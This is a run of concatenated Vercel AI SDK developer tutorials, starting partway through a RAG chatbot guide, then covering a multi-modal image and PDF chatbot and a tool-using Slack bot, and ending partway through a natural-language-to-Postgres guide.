
The AI SDK has a feature called maxSteps which will automatically send tool call results back to the model!

Open your root page (app/page.tsx) and add the following key to the useChat configuration object:

// ... Rest of your code

const { messages, input, handleInputChange, handleSubmit } = useChat({
  maxSteps: 3,
});

// ... Rest of your code

Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.

Retrieve Resource Tool

The model can now add and embed arbitrary information to your knowledge base. However, it still isn’t able to query it. Let’s create a new tool to allow the model to answer questions by finding relevant information in your knowledge base.

To find similar content, you will need to embed the users query, search the database for semantic similarities, then pass those items to the model as context alongside the query. To achieve this, let’s update your embedding logic file (lib/ai/embedding.ts):

import { embed, embedMany } from 'ai';
import { openai } from '@ai-sdk/openai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';

const embeddingModel = openai.embedding('text-embedding-ada-002');

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

export const generateEmbedding = async (value: string): Promise<number[]> => {
  const input = value.replaceAll('\\n', ' ');
  const { embedding } = await embed({
    model: embeddingModel,
    value: input,
  });
  return embedding;
};

export const findRelevantContent = async (userQuery: string) => {
  const userQueryEmbedded = await generateEmbedding(userQuery);
  const similarity = sql<number>`1 - (${cosineDistance(
    embeddings.embedding,
    userQueryEmbedded,
  )})`;
  const similarGuides = await db
    .select({ name: embeddings.content, similarity })
    .from(embeddings)
    .where(gt(similarity, 0.5))
    .orderBy(t => desc(t.similarity))
    .limit(4);
  return similarGuides;
};

In this code, you add two functions:

generateEmbedding: generate a single embedding from an input string
findRelevantContent: embeds the user’s query, searches the database for similar items, then returns relevant items

With that done, it’s onto the final step: creating the tool.

Go back to your route handler (api/chat/route.ts) and add a new tool called getInformation:

import { createResource } from '@/lib/actions/resources';
import { openai } from '@ai-sdk/openai';
import { streamText, tool } from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages,
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        parameters: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
      getInformation: tool({
        description: `get information from your knowledge base to answer questions.`,
        parameters: z.object({
          question: z.string().describe('the users question'),
        }),
        execute: async ({ question }) => findRelevantContent(question),
      }),
    },
  });

  return result.toDataStreamResponse();
}

Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!

Conclusion

Congratulations, you have successfully built an AI chatbot that can dynamically add and retrieve information to and from a knowledge base. Throughout this guide, you learned how to create and store embeddings, set up server actions to manage resources, and use tools to extend the capabilities of your chatbot.

title: Multi-Modal Chatbot description: Learn how to build a multi-modal chatbot that can process images and PDFs with the AI SDK. tags: ['multi-modal', 'chatbot', 'images', 'pdf', 'vision', 'next']

Multi-Modal Chatbot

In this guide, you will build a multi-modal AI-chatbot capable of understanding both images and PDFs.

Multi-modal refers to the ability of the chatbot to understand and generate responses in multiple formats, such as text, images, PDFs, and videos. In this example, we will focus on sending images and PDFs and generating text-based responses.

Different AI providers have varying levels of multi-modal support, for example:

OpenAI (GPT-4o): Supports image input
Anthropic (Sonnet 3.5): Supports image and PDF input
Google (Gemini 2.0): Supports image and PDF input

We'll first build a chatbot capable of generating responses based on an image input using OpenAI, then show how to switch providers to handle PDFs.

Prerequisites

To follow this quickstart, you'll need:

Node.js 18+ and pnpm installed on your local development machine.
An OpenAI API key.
An Anthropic API Key.

If you haven't obtained your OpenAI API key, you can do so by signing up on the OpenAI website.

If you haven't obtained your Anthropic API key, you can do so by signing up on Anthropic's website.

Create Your Application

Start by creating a new Next.js application. This command will create a new directory named multi-modal-chatbot and set up a basic Next.js application inside it.

Navigate to the newly created directory:

Install dependencies

Install ai and @ai-sdk/openai, the Vercel AI package and the AI SDK's OpenAI provider respectively.

Configure OpenAI API key

Create a .env.local file in your project root and add your OpenAI API Key. This key is used to authenticate your application with the OpenAI service.

Edit the .env.local file:

OPENAI_API_KEY=xxxxxxxxx

Replace xxxxxxxxx with your actual OpenAI API key.

Implementation Plan

To build a multi-modal chatbot, you will need to:

Create a Route Handler to handle incoming chat messages and generate responses.
Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
Add the ability to upload images and attach them alongside the chat messages.

Create a Route Handler

Create a route handler, app/api/chat/route.ts and add the following code:

import { openai } from '@ai-sdk/openai';
import { streamText, convertToModelMessages, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Let's take a look at what is happening in this code:

Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the chatbot and provides the chatbot with the necessary context to make the next generation.
Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider (imported from @ai-sdk/openai) and messages (converted in step 2). You can pass additional settings to further customise the model's behaviour.
The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
Finally, return the result to the client to stream the response.

This Route Handler creates a POST request endpoint at /api/chat.

Wire up the UI

Now that you have a Route Handler that can query a large language model (LLM), it's time to setup your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.

Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.content}
        </div>
      ))}

      <form
        onSubmit={handleSubmit}
        className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
      >
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={handleInputChange}
        />
      </form>
    </div>
  );
}

This page utilizes the useChat hook, which will, by default, use the POST API route you created earlier (/api/chat). The hook provides functions and state for handling user input and form submission. The useChat hook provides multiple utility functions and state variables:

messages - the current chat messages (an array of objects with id, role, and content properties).
input - the current value of the user's input field.
handleInputChange and handleSubmit - functions to handle user interactions (typing into the input field and submitting the form, respectively).
status - the status of the API request.

Add Image Upload

To make your chatbot multi-modal, let's add the ability to upload and send images to the model. There are two ways to send attachments alongside a message with the useChat hook: by providing a FileList object or a list of URLs to the handleSubmit function. In this guide, you will be using the FileList approach as it does not require any additional setup.

Update your root page (app/page.tsx) with the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
import Image from 'next/image';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();

  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.content}
          <div>
            {m?.attachments
              ?.filter(attachment =>
                attachment?.contentType?.startsWith('image/'),
              )
              .map((attachment, index) => (
                <Image
                  key={`${m.id}-${index}`}
                  src={attachment.url}
                  width={500}
                  height={500}
                  alt={attachment.name ?? `attachment-${index}`}
                />
              ))}
          </div>
        </div>
      ))}

      <form
        className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
        onSubmit={event => {
          handleSubmit(event, {
            attachments: files,
          });

          setFiles(undefined);

          if (fileInputRef.current) {
            fileInputRef.current.value = '';
          }
        }}
      >
        <input
          type="file"
          className=""
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={handleInputChange}
        />
      </form>
    </div>
  );
}

In this code, you:

Create state to hold the files and create a ref to the file input field.
Display the "uploaded" files in the UI.
Update the onSubmit function, to call the handleSubmit function manually, passing the files as an option using the attachments key.
Add a file input field to the form, including an onChange handler to handle updating the files state.

Running Your Application

With that, you have built everything you need for your multi-modal chatbot! To start your application, use the command:

Head to your browser and open http://localhost:3000. You should see an input field and a button to upload an image.

Upload an image and ask the model to describe what it sees. Watch as the model's response is streamed back to you!

Working with PDFs

To enable PDF support, you can switch to a provider that handles PDFs like Google's Gemini or Anthropic's Claude. Here's how to modify the code to use Anthropic:

First install the Anthropic provider:

Update your environment variables:

OPENAI_API_KEY=xxxxxxxxx
ANTHROPIC_API_KEY=xxxxxxxxx

Modify your route handler:

import { openai } from '@ai-sdk/openai';
import { anthropic } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, UIMessage } from 'ai';

export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  // check if user has sent a PDF
  const messagesHavePDF = messages.some(message =>
    message.attachments?.some(a => a.contentType === 'application/pdf'),
  );

  const result = streamText({
    model: messagesHavePDF
      ? anthropic('claude-3-5-sonnet-latest')
      : openai('gpt-4o'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Now your chatbot can process both images and PDFs! You automatically route PDF requests to Claude Sonnet 3.5 and image requests to OpenAI's gpt-4o model.

Finally, to display PDFs in your chat interface, update the message rendering code in your frontend to show PDF attachments in an <iframe>:

'use client';

import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
import Image from 'next/image';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();

  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.content}
          <div>
            {m?.attachments
              ?.filter(
                attachment =>
                  attachment?.contentType?.startsWith('image/') ||
                  attachment?.contentType?.startsWith('application/pdf'),
              )
              .map((attachment, index) =>
                attachment.contentType?.startsWith('image/') ? (
                  <Image
                    key={`${m.id}-${index}`}
                    src={attachment.url}
                    width={500}
                    height={500}
                    alt={attachment.name ?? `attachment-${index}`}
                  />
                ) : attachment.contentType?.startsWith('application/pdf') ? (
                  <iframe
                    key={`${m.id}-${index}`}
                    src={attachment.url}
                    width={500}
                    height={600}
                    title={attachment.name ?? `attachment-${index}`}
                  />
                ) : null,
              )}
          </div>
        </div>
      ))}

      <form
        className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
        onSubmit={event => {
          handleSubmit(event, {
            attachments: files,
          });

          setFiles(undefined);

          if (fileInputRef.current) {
            fileInputRef.current.value = '';
          }
        }}
      >
        <input
          type="file"
          className=""
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={handleInputChange}
        />
      </form>
    </div>
  );
}

Try uploading a PDF and asking questions about its contents.

Where to Next?

You've built a multi-modal AI chatbot using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling or introducing more granular control over AI and UI states.

If you are looking to leverage the broader capabilities of LLMs, Vercel AI SDK Core provides a comprehensive set of lower-level tools and APIs that will help you unlock a wider range of AI functionalities beyond the chatbot paradigm.

title: Slackbot Guide description: Learn how to use the AI SDK to build an AI Slackbot. tags: ['agents', 'chatbot']

Building a Slack AI Chatbot with the AI SDK

In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.

Slack App Setup

Before we start building, you'll need to create and configure a Slack app:

Go to api.slack.com/apps
Click "Create New App" and choose "From scratch"
Give your app a name and select your workspace
Under "OAuth & Permissions", add the following bot token scopes:
- app_mentions:read
- chat:write
- im:history
- im:write
- assistant:write
Install the app to your workspace (button under "OAuth Tokens" subsection)
Copy the Bot User OAuth Token and Signing Secret for the next step
Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"

Project Setup

This project uses the following stack:

Getting Started

Clone the repository and check out the starter branch

Install dependencies

Project Structure

The starter repository already includes:

Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
General utility functions (lib/utils.ts) including initial Exa setup
Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
An API endpoint (POST) for Slack events (api/events.ts)

Event Handler

First, let's take a look at our API route (api/events.ts):

import type { SlackEvent } from '@slack/web-api';
import {
  assistantThreadMessage,
  handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';

export async function POST(request: Request) {
  const rawBody = await request.text();
  const payload = JSON.parse(rawBody);
  const requestType = payload.type as 'url_verification' | 'event_callback';

  // See https://api.slack.com/events/url_verification
  if (requestType === 'url_verification') {
    return new Response(payload.challenge, { status: 200 });
  }

  await verifyRequest({ requestType, request, rawBody });

  try {
    const botUserId = await getBotId();

    const event = payload.event as SlackEvent;

    if (event.type === 'app_mention') {
      waitUntil(handleNewAppMention(event, botUserId));
    }

    if (event.type === 'assistant_thread_started') {
      waitUntil(assistantThreadMessage(event));
    }

    if (
      event.type === 'message' &&
      !event.subtype &&
      event.channel_type === 'im' &&
      !event.bot_id &&
      !event.bot_profile &&
      event.bot_id !== botUserId
    ) {
      waitUntil(handleNewAssistantMessage(event, botUserId));
    }

    return new Response('Success!', { status: 200 });
  } catch (error) {
    console.error('Error generating response', error);
    return new Response('Error generating response', { status: 500 });
  }
}

This file defines a POST function that handles incoming requests from Slack. First, you check the request type to see if it's a URL verification request. If it is, you respond with the challenge string provided by Slack. If it's an event callback, you verify the request and then have access to the event data. This is where you can implement your event handling logic.

You then handle three types of events: app_mention, assistant_thread_started, and message:

For app_mention, you call handleNewAppMention with the event and the bot user ID.
For assistant_thread_started, you call assistantThreadMessage with the event.
For message, you call handleNewAssistantMessage with the event and the bot user ID.

Finally, you respond with a success message to Slack. Note, each handler function is wrapped in a waitUntil function. Let's take a look at what this means and why it's important.

The waitUntil Function

Slack expects a response within 3 seconds to confirm the request is being handled. However, generating AI responses can take longer. If you don't respond to the Slack request within 3 seconds, Slack will send another request, leading to another invocation of your API route, another call to the LLM, and ultimately another response to the user. To solve this, you can use the waitUntil function, which allows you to run your AI logic after the response is sent, without blocking the response itself.

This means, your API endpoint will:

Immediately respond to Slack (within 3 seconds)
Continue processing the message asynchronously
Send the AI response when it's ready

Event Handlers

Let's look at how each event type is currently handled.

App Mentions

When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:

Checks if the message is from a bot to avoid infinite response loops
Creates a status updater to show the bot is "thinking"
If the mention is in a thread, it retrieves the thread history
Calls the LLM with the message content (using the generateResponse function which you will implement in the next section)
Updates the initial "thinking" message with the AI response

Here's the code for the handleNewAppMention function:

import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

const updateStatusUtil = async (
  initialStatus: string,
  event: AppMentionEvent,
) => {
  const initialMessage = await client.chat.postMessage({
    channel: event.channel,
    thread_ts: event.thread_ts ?? event.ts,
    text: initialStatus,
  });

  if (!initialMessage || !initialMessage.ts)
    throw new Error('Failed to post initial message');

  const updateMessage = async (status: string) => {
    await client.chat.update({
      channel: event.channel,
      ts: initialMessage.ts as string,
      text: status,
    });
  };
  return updateMessage;
};

export async function handleNewAppMention(
  event: AppMentionEvent,
  botUserId: string,
) {
  console.log('Handling app mention');
  if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
    console.log('Skipping app mention');
    return;
  }

  const { thread_ts, channel } = event;
  const updateMessage = await updateStatusUtil('is thinking...', event);

  if (thread_ts) {
    const messages = await getThread(channel, thread_ts, botUserId);
    const result = await generateResponse(messages, updateMessage);
    updateMessage(result);
  } else {
    const result = await generateResponse(
      [{ role: 'user', content: event.text }],
      updateMessage,
    );
    updateMessage(result);
  }
}

Now let's see how new assistant threads and messages are handled.

Assistant Thread Messages

When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:

Posts a welcome message to the thread
Sets up suggested prompts to help users get started

Here's the code for the assistantThreadMessage function:

import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';

export async function assistantThreadMessage(
  event: AssistantThreadStartedEvent,
) {
  const { channel_id, thread_ts } = event.assistant_thread;
  console.log(`Thread started: ${channel_id} ${thread_ts}`);
  console.log(JSON.stringify(event));

  await client.chat.postMessage({
    channel: channel_id,
    thread_ts: thread_ts,
    text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
  });

  await client.assistant.threads.setSuggestedPrompts({
    channel_id: channel_id,
    thread_ts: thread_ts,
    prompts: [
      {
        title: 'Get the weather',
        message: 'What is the current weather in London?',
      },
      {
        title: 'Get the news',
        message: 'What is the latest Premier League news from the BBC?',
      },
    ],
  });
}

Direct Messages

For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:

Verifies the message isn't from a bot
Updates the status to show the response is being generated
Retrieves the conversation history
Calls the LLM with the conversation context
Posts the LLM's response to the thread

Here's the code for the handleNewAssistantMessage function:

import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

export async function handleNewAssistantMessage(
  event: GenericMessageEvent,
  botUserId: string,
) {
  if (
    event.bot_id ||
    event.bot_id === botUserId ||
    event.bot_profile ||
    !event.thread_ts
  )
    return;

  const { thread_ts, channel } = event;
  const updateStatus = updateStatusUtil(channel, thread_ts);
  updateStatus('is thinking...');

  const messages = await getThread(channel, thread_ts, botUserId);
  const result = await generateResponse(messages, updateStatus);

  await client.chat.postMessage({
    channel: channel,
    thread_ts: thread_ts,
    text: result,
    unfurl_links: false,
    blocks: [
      {
        type: 'section',
        text: {
          type: 'mrkdwn',
          text: result,
        },
      },
    ],
  });

  updateStatus('');
}

With the event handlers in place, let's now implement the AI logic.

Implementing AI Logic

The core of our application is the generateResponse function in lib/generate-response.ts, which processes messages and generates responses using the AI SDK.

Here's how to implement it:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import type { ModelMessage } from 'ai';

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: openai('gpt-4o-mini'),
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}`,
    messages,
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

This basic implementation:

Uses the AI SDK's generateText function to call OpenAI's gpt-4o model
Provides a system prompt to guide the model's behavior
Formats the response for Slack's markdown format

Enhancing with Tools

The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:

import { openai } from '@ai-sdk/openai';
import { generateText, tool } from 'ai';
import type { ModelMessage } from 'ai';
import { z } from 'zod';
import { exa } from './utils';

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: openai('gpt-4o'),
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}
    - Always include sources in your final response if you use web search.`,
    messages,
    maxSteps: 10,
    tools: {
      getWeather: tool({
        description: 'Get the current weather at a location',
        parameters: z.object({
          latitude: z.number(),
          longitude: z.number(),
          city: z.string(),
        }),
        execute: async ({ latitude, longitude, city }) => {
          updateStatus?.(`is getting weather for ${city}...`);

          const response = await fetch(
            `https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
          );

          const weatherData = await response.json();
          return {
            temperature: weatherData.current.temperature_2m,
            weatherCode: weatherData.current.weathercode,
            humidity: weatherData.current.relativehumidity_2m,
            city,
          };
        },
      }),
      searchWeb: tool({
        description: 'Use this to search the web for information',
        parameters: z.object({
          query: z.string(),
          specificDomain: z
            .string()
            .nullable()
            .describe(
              'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
            ),
        }),
        execute: async ({ query, specificDomain }) => {
          updateStatus?.(`is searching the web for ${query}...`);
          const { results } = await exa.searchAndContents(query, {
            livecrawl: 'always',
            numResults: 3,
            includeDomains: specificDomain ? [specificDomain] : undefined,
          });

          return {
            results: results.map(result => ({
              title: result.title,
              url: result.url,
              snippet: result.text.slice(0, 1000),
            })),
          };
        },
      }),
    },
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

In this updated implementation:

You added two tools:
- getWeather: Fetches weather data for a specified location
- searchWeb: Searches the web for information using the Exa API
You set maxSteps: 10 to enable multi-step conversations. This will automatically send any tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.

How It Works

When a user interacts with your bot:

The Slack event is received and processed by your API endpoint
The user's message and the thread history is passed to the generateResponse function
The AI SDK processes the message and may invoke tools as needed
The response is formatted for Slack and sent back to the user

The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:

Recognize this as a weather query
Call the getWeather tool with London's coordinates (inferred by the LLM)
Process the weather data
Generate a final response, answering the user's question

Deploying the App

Install the Vercel CLI

Deploy the app

Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables

SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key

Head back to the https://api.slack.com/ and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL.

https://your-vercel-url.vercel.app/api/events

On the Events Subscription page, subscribe to the following events.
- app_mention
- assistant_thread_started
- message:im

Finally, head to Slack and test the app by sending a message to the bot.

Next Steps

You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:

Add memory for specific users to give the LLM context of previous interactions
Implement more tools like database queries or knowledge base searches
Add support for rich message formatting with blocks
Add analytics to track usage patterns

title: Natural Language Postgres description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language. tags: ['agents', 'next', 'tools']

Natural Language Postgres Guide

In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.

The application will:

Generate SQL queries from a natural language input
Explain query components in plain English
Create a chart to visualise query results

You can find a completed version of this project at natural-language-postgres.vercel.app.

Project setup

This project uses the following stack:

Next.js (App Router)
AI SDK
OpenAI
Zod
Postgres with Vercel Postgres
shadcn-ui and TailwindCSS for styling
Recharts for data visualization

Clone repo

To focus on the AI-powered functionality rather than project setup and configuration we've prepared a starter repository which includes a database schema and a few components.

Clone the starter repository and check out the starter branch:

Project setup and data

Let's set up the project and seed the database with the dataset:

Install dependencies:

Copy the example environment variables file:

Add your environment variables to .env:

OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."

This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter in your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root

About the dataset

The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):

Company name
Valuation
Date joined (unicorn status)
Country
City
Industry
Select investors

This dataset contains over 1000 rows of data over 7 columns, giving us plenty of structured data to analyze. This makes it perfect for exploring various SQL queries that can reveal interesting insights about the unicorn startup ecosystem.

Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:

Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.

Start the development server:

Your application should now be running at http://localhost:3000.

Project structure

The starter repository already includes everything that you will need, including:

Database seed script (lib/seed.ts)
Basic components built with shadcn/ui (components/)
Function to run SQL queries (app/actions.ts)
Type definitions for the database schema (lib/types.ts)

Existing components

The application contains a single page in app/page.tsx that serves as the main interface.

At the top, you'll find a header (header.tsx) displaying the application title and description. Below that is an input field and search button (search.tsx) where you can enter natural language queries.

Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.

When you submit a query:

The suggested queries section disappears and a loading state appears
Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx) which will eventually show your generated SQL
Below that is an empty results area with "No results found" (results.tsx)

After you implement the core functionality:

The results section will display data in a table format
A toggle button will allow switching between table and chart views
The chart view will visualize your query results

Let's implement the AI-powered functionality to bring it all together.

Building the application

As a reminder, this application will have three main features:

Generate SQL queries from natural language
Create a chart from the query results
Explain SQL queries in plain English

For each of these features, you'll use the AI SDK via Server Actions to interact with OpenAI's GPT-4o and GPT-4o-mini models. Server Actions are a powerful React Server Component feature that allows you to call server-side functions directly from your frontend code.

Let's start with generating a SQL query from natural language.

Generate SQL queries

Providing context

For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:

Schema information
Example data formats
Available SQL operations
Best practices for query structure
Nuanced advice for specific fields

Let's write a prompt that includes all of this information:

You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:

unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

Only retrieval queries are allowed.

For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').

Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (ie. what is Vercel's valuation would select company and valuation').

The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health

If the user asks for a category that is not in the list, infer based on the list above.

Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.

If the user asks for 'over time' data, return by year.

When searching for UK or USA, write out United Kingdom or United States respectively.

EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.

There are several important elements of this prompt:

Schema description helps the model understand exactly what data fields to work with
Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted

This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.

Create a Server Action

With the prompt done, let's create a Server Action.

Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).

Add a new action. This action should be asynchronous and take in one parameter - the natural language query.

/* ...rest of the file... */

export const generateQuery = async (input: string) => {};

In this action, you'll use the generateObject function from the AI SDK which allows you to constrain the model's output to a pre-defined schema. This process, sometimes called structured output, ensures the model returns only the SQL query without any additional prefixes, explanations, or formatting that would require manual parsing.

/* ...other imports... */
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

/* ...rest of the file... */

export const generateQuery = async (input: string) => {
  'use server';
  try {
    const result = await generateObject({
      model: openai('gpt-4o'),
      system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
      schema: z.object({
        query: z.string(),
      }),
    });
    return result.object.query;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Note, you are constraining the output to a single string field called query using zod, a TypeScript schema validation library. This will ensure the model only returns the SQL query itself. The resulting generated query will then be returned.

Update the frontend

